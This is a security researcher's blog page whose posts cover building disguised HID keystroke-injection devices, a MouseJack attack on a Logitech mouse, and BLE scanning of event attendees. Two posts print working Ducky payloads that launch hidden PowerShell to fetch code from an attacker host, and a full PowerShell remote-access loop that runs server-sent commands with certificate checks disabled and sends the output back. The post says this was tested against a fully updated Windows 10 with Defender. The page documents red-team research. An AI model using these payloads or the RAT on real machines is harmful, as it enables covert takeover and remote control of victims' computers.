David Sopas – Web Security Researcher

27/12/19 Hardware , Tips and Tricks # , , , , , ,

Gone in 30 seconds – a HID cable story tale

Gone in 30 seconds – a HID cable story tale

Following what I mentioned in my previous post, I went to my electronics bin and gathered a Logitech Wireless mouse (M185) and a USB cable.

On the mouse, I took the receiver – a Logitech Unifying Receiver CU0010 (nRF24L family):

And cut one of the sides of a random USB cable:

Split the wires:

Removed the cap from the Logitech receiver:

Solder (really need to improve my soldering skills) the wires (GND, Data+, Data- and VCC) into the receiver:

Put the USB connector cap on:

Add a nice plastic USB enclosure to make it more real:

All the process was fast, I took around 5 minutes to cut, solder and super-glue all together. In the end I think it could be better, specially when I rammed the USB connector with a knife.

For the second part it took a little more because I wanted to use another alternative to the existing HID cables – so I went with CrazyRadio + Bastille firmware and a final touch of bettercap HID module to send my Ducky payload. I wanted to take advantage of what I had and that’s it.

This is basically a walkthrough of what I did:

  • Write down the MAC address of the device (using HID.recon from bettercap or by checking the properties of the device – this will depend on your OS)
  • Write your Ducky payload – in this PoC is just a reverse shell to my VPS
DELAY 750
GUI r
DELAY 500
STRING cmd
ENTER
DELAY 500
STRING powershell -NoP -NonI -Exec Bypass -W hidden "IEX (New-Object System.Net.WebClient).DownloadString('http://ATTACKER_IP/ps.txt')"
ENTER
DELAY 750
function getUser() {
    $string = ([System.Security.Principal.WindowsIdentity]::GetCurrent().Name) | Out-String
    $string = $string.Trim()
    return $string
}
 
function getComputerName() {
    $string = (Get-WmiObject Win32_OperatingSystem).CSName | Out-String
    $string = $string.Trim()
    return $string
}
 
$resp = "http://ATTACKER_IP:8000/rat"
$w = New-Object Net.WebClient
while($true) {
    [System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}
    $r_get = $w.DownloadString($resp)
    $d = [System.Convert]::FromBase64String($r_get);
    $Ds = [System.Text.Encoding]::UTF8.GetString($d);
 
    while($r_get) {
        $output = invoke-expression $Ds | out-string
        $w.UploadString($resp, $output)
        break
    }
}
  • Connect the HID cable on the Windows victim machine (don’t forget that the payload will be OS dependable)
  • Start your listener on the attacker machine
  • Connect CrazyRadio and start bettercap
bettercap -eval="hid.recon on"
hid.inject MAC PT ducky.txt

And its basically game-over.
I did a short video to illustrate the PoC – https://www.youtube.com/watch?v=y9C-4bcgmIU.

In the process of creating this HID cable with “leftovers” I learn a few things:

  • Some Logitech Unifying receivers are not vulnerable to some known attacks – like keystroke injection;
  • Be careful when putting solder on the USB contacts. Just put a small amount and spread it slightly with your iron, that way the PCB will fit better on the USB connector;
  • Do a first run on a USB hub just to make sure you don’t burn your laptop port or something;
  • Don’t waste money buying expensive HID cables (specially when ripped from others) when you can make your own for less that $10;
  • Last point, don’t keep your brain focused on doing what others do and don’t be afraid do fail at first. Be persistent and never quit.
no responses
19/12/19 Hardware , Tips and Tricks # , , , , ,

Make HID great again

Since ever I’ve been using HID devices on red-team assessments at Char49 – specially using Rubber Ducky and latelly with Cactus WHID.
I wanted to play a little more so I’ve picked one of my favourite tools from my arsenal which is the tiny Digispark. This ATTINY85 with 8kb flash memory – became part of most of my assessments. From deap-drops to implants.

My last implant – we can call it HID modding – was to add a Digispark inside a damaged Wireless Adapter. The only components that I left from the original product was the USB connector and the external case.
Before connecting everything, I did a test lab using a old USB connector and the Digipark with soldered pins.

Why? In the past I did found bad PCB prints that misplaced DATA+ with the DATA- (in the Digispark is USB+ and USB-) so before using my shitty soldering skills I created the setup for future HID modding.

I ended up with the following schematics:

Everything was working properly so I added everything inside the Wireless Adapter and used super-glue to close the case.

Now I had a concealed HID device that I can put on a client and make him think is just an innocent network device.

The only part missing is the code. I connected the device to Arduino IDE and uploaded my sketch – which will do the following:

  1. Download a file from my domain using powershell
  2. Execute the ps1 file
  3. Get the reverse shell which pointed to my VPS

Ducky payload (I used duck2spark from mame82 to convert my duck scripts to digispark source):

DELAY 750
GUI r
DELAY 500
STRING cmd
ENTER
DELAY 500
STRING powershell -NoP -NonI -Exec Bypass "IEX (New-Object System.Net.WebClient).DownloadFile('http://YOUR-IP/ps.txt',\"file.ps1\")";
ENTER
DELAY 750
STRING cls
ENTER
DELAY 500
STRING powershell -W Hidden .\file.ps1
ENTER

Powershell script:

function getUser() {
	$string = ([System.Security.Principal.WindowsIdentity]::GetCurrent().Name) | Out-String
    $string = $string.Trim()
    return $string
}

function getComputerName() {
    $string = (Get-WmiObject Win32_OperatingSystem).CSName | Out-String
    $string = $string.Trim()
    return $string
}

$resp = "http://YOUR-IP:8000/rat"
$w = New-Object Net.WebClient
while($true) {
	[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}
	$r_get = $w.DownloadString($resp)
    $d = [System.Convert]::FromBase64String($r_get);
    $Ds = [System.Text.Encoding]::UTF8.GetString($d);

	while($r_get) {
		$output = invoke-expression $Ds | out-string
		$w.UploadString($resp, $output)
		break
	}
}

I created a small video for educational purposes only – find it here.

The target machine was a fresh and up-to-date Windows 10 Pro install with Windows Defender and Firewall on.

How much did it cost?

Well the only thing was really the Digispark which you can get on Aliexpress for 1 to 3 bucks a piece.

I already have other ideas, like adding Digispark on other “junk” that I have on my “crappy stuff that I should recycle” – RC toys, USB convertors, IP cameras, etc.

To conclude this post, I recently bought Evil Crow Cable and O.MG DemonSeed EDU so I hope to have time to explore these devices.

To learn more about HID, you should follow these talented guys on Twitter – @mame82, @lucabongiorni and @_MG_.
Also I recommend everyone to see the talk from my mate @kripthor regarding the steps on creating UberHid.

Any feedback feel free to ping me on Twitter – @dsopas.

 

 

no responses
23/08/19 Hardware , Tools , Travel # , , ,

My Red Team assessment hardware

My Red Team assessment hardware

Many friends and colleagues are asking me what I use for red team assessments so I decided to write a post with my arsenal – which will could not reflect others Red Team approach.

Also, the hardware is task specific. For example, if you’re going on a Wifi hunt you might not need a set of lockpicking tools – well you never know πŸ™‚

Other people lists can be found here:

Feel free to Tweet @dsopas with new lists or even recommend stuff for me to buy πŸ™‚

no responses
22/08/19 Hardware # , ,

Pointer hijack and portapack testing

When I was in Casa das Artes – venue for an event that I would give a talk – I was discussing some RF topics with my pal Zezadas. One of them was to play with RF pointers… I went home the next day and did a small prank which involved the hackrf replay of a windows (works in 7 or 10) shutdown – video -> here!

If you want to have real fun with pointers – check our mame82 LOGITracker research.

BUT not happy with that, I finally got a portapack for “portability” of hackrf. What should be the first video for showing off portapack? My cat’s RF mouse πŸ˜€

Video? -> here!

no responses
22/08/19 Interesting Readings # , ,

Checkmarx Security Research Team latest work

We’ve got a lot of new research in our hands but so far only one got disclosed to the public.

I’m talking about the LeapFrog LeapPad Ultimate research. It got a few hits on the media (CNET, The Telegraph,Β  ZDNET, BleepingComputer,Β  Threatpost, Fortune, …) and I’m very proud of this work specially because it keeps children more secure.

You can see a small PoC video here and the full research at the Checkmarx blog.

no responses
18/03/19 Advisories , Hardware # , , , ,

Popular wireless Logitech mouse vulnerable to keystroke injection

One of the things that keeps me on the security path is the opportunity to learn new things each day.
After seing the new update on Bettercap – which supports HID (Human Interface Device) – I decided to read about it – specially on MouseJack keystroke injection attacks.

I went throught the affected devices list and didn’t have any on my own to test it. BUT I had a Logitech M185 wireless mouse which is very popular because… it’s cheap comparing to other models.

I grabbed the CrazyRadio dongle – which was waiting for better usage on my lab –Β  and put it into action.

I opened Bettercap and turn on the HID recon:

sudo bettercap -eval="net.recon off;hid.recon on"

After a while I detected my Logitech M185 and also other stuff:

Just to make sure it was really my device, I did a simple HID.sniff ADDR and pressed a few buttons. Don’t want to pop shells anywhere πŸ™‚

Next, I created a simple DuckyScript to show the Windows calcultator on the desktop:

GUI r
DELAY 200
STRING calc
DELAY 200
ENTER

What we have so far:

  • Bettercap running with HID module on
  • Detected my Logitech M185 2.4Ghz mouse
  • Created the DuckyScript to use (ducky.txt)

The only thing missing is to inject our payload and see what happens:

hid.inject ADDR PT ducky.txt

You can see the end result of this proof-of-concept video – https://www.youtube.com/watch?v=TdPRYWkYarM

Don’t want to be a spoiler but… yeh it’s vulnerable πŸ™‚

no responses
01/03/19 IoT # , , , , , , ,

BLE Surfing an Orienteering event

BLE Surfing an Orienteering event

It was 2pm and more than 1500 individuals were getting ready to start an international Orienteering event. To me it was opportunity to test my new BLE tool and at the same time, know more about the number of sports wearable’s people use nowadays – to know what to break next πŸ™‚

So I positioned my crappy Android phone on the center of the event and just hit play.

After a couple of hours, I decided to check it out and I got a 701 devices detected – crazy number. Just by curiosity I made the Top5 brands and devices:

  1. Garmin – 542 devices
  2. Polar – 86 devices
  3. Fitbit – 28 devices
  4. TomTom – 21 devices
  5. Samsung – 17 devices

Around 77% of the devices detected were Garmin. Huge market share.

With that percentage, the Top5 devices were all Garmin:

  1. Forerunner 235 – 180 devices
  2. Forerunner 735 XT – 67 devices
  3. Forerunner 35 – 46 devices
  4. Forerunner 920 – 43 devices
  5. Fenix 3 HR – 30 devices

I already did some research on Garmin and TomTom, also played with someForerunner models and they show the real bd_addr (Bluetooth Address) which could be used to… track people. But this wasn’t the case.
My real goal was to test large data into my app and see how it handles on rendering them on a map. No information or connection was made to any device.

Just by curiosity, you know that only the Garmin watches had a value of around 180k?

no responses